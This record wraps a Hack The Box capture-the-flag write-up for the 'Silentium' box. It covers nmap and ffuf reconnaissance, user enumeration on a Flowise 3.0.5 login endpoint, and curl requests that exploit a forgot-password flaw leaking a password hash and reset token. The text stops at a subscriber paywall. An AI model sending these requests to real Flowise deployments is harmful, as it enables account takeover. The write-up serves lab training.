Raw Record Source

{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreiahczf4ck6rleacfuftx7qjz3z5o2samc4xfidssbuclcucvzee3i",
    "uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mjc4s3vusez2"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreieezeqdwqu6g7wotmx7vg5zohksll7dn7yl7bv2pcpr4wqldnfsnm"
    },
    "mimeType": "image/jpeg",
    "size": 111833
  },
  "description": "SUMMARY Silentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities. RECONNAISSANCE NMAP SCAN nmap -sC -sV -p 22,80  PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Silentium | Institutional Capital & Lending Solutions Two ports open: SSH and HTTP. Port 80 serves an ngin...",
  "path": "/hack-the-box-season-10-htb-silentium-writeup-easy-weekly-april-12th-2026/",
  "publishedAt": "2026-04-12T08:00:00.000Z",
  "site": "https://1337sheets.com",
  "tags": [
    "Subscribe now"
  ],
  "textContent": "## Summary\n\nSilentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities.\n\n* * *\n\n## Reconnaissance\n\n### Nmap Scan\n\n\n    nmap -sC -sV -p 22,80 <TARGET_IP>\n\n\n\n    PORT   STATE SERVICE VERSION\n    22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15\n    80/tcp open  http    nginx 1.24.0 (Ubuntu)\n    |_http-title: Silentium | Institutional Capital & Lending Solutions\n\n\nTwo ports open: SSH and HTTP. Port 80 serves an nginx web server that redirects to `silentium.htb`.\n\n### Virtual Host Discovery\n\n\n    ffuf -u http://silentium.htb -H \"Host: FUZZ.silentium.htb\" \\\n      -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac\n\n\nDiscovered `staging.silentium.htb` (Status 200).\n\nAdded both hostnames to `/etc/hosts`:\n\n\n    <TARGET_IP> silentium.htb staging.silentium.htb\n\n\n* * *\n\n## Enumeration\n\n### silentium.htb - Main Site\n\nA static corporate website for \"Silentium International Asset Management\", an institutional finance firm. The team section lists:\n\n  * **Marcus Thorne** - Managing Director\n  * **Ben** - Head of Financial Systems\n  * **Elena Rossi** - Chief Risk Officer\n\n\n\nThe name \"Ben\" with only a first name is notable as a potential username.\n\n### staging.silentium.htb - Flowise 3.0.5\n\nThe staging subdomain runs **Flowise 3.0.5** , an open-source AI agent builder platform.\n\n\n    curl -s http://staging.silentium.htb/api/v1/version\n    # {\"version\":\"3.0.5\"}\n\n\nMost API endpoints return `{\"error\":\"Unauthorized Access\"}`, confirming authentication is enabled.\n\n### User Enumeration\n\nThe Flowise login endpoint leaks whether a user exists via different error messages:\n\n\n    # Non-existent user returns 404\n    curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"email\":\"admin@silentium.htb\",\"password\":\"test\"}'\n    # {\"statusCode\":404,\"message\":\"User Not Found\"}\n\n    # Valid user returns 401\n    curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"email\":\"ben@silentium.htb\",\"password\":\"test\"}'\n    # {\"statusCode\":401,\"message\":\"Incorrect Email or Password\"}\n\n\n**Confirmed valid user** : `ben@silentium.htb`\n\n* * *\n\n## Initial Access\n\n### Step 1: GHSA-jc5m-wrp2-qq38 - PII Disclosure on Forgot Password\n\n**Vulnerability** : Flowise <= 3.0.12 exposes sensitive user data (bcrypt password hash and password reset token) in the response of the unauthenticated forgot-password endpoint.\n\n\n    curl -s -X POST \"http://staging.silentium.htb/api/v1/account/forgot-password\" \\\n      -H \"Content-Type: application/json\" \\\n      -d '{\"user\":{\"email\":\"ben@silentium.htb\"}}'\n\n\n**Response** (key fields):\n\n\n    {\n      \"user\": {\n        \"id\": \"<REDACTED_UUID>\",\n        \"name\": \"admin\",\n        \"email\": \"ben@silentium.htb\",\n        \"credential\": \"<REDACTED_BCRYPT_HASH>\",\n        \"tempToken\": \"<REDACTED_TOKEN>\",\n        \"tokenExpiry\": \"<REDACTED_TIMESTAMP>\",\n        \"status\": \"active\"\n      }\n    }\n\n\n**Leaked data** :\n\n  * `credential` - bcrypt password hash (cost factor 5)\n  * `tempToken` - password reset token (valid for 15 minutes)\n\n\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
  "title": "Hack The Box - Season 10 HTB Silentium Writeup - Easy- Weekly - April 12th, 2026",
  "updatedAt": "2026-04-12T10:18:29.900Z"
}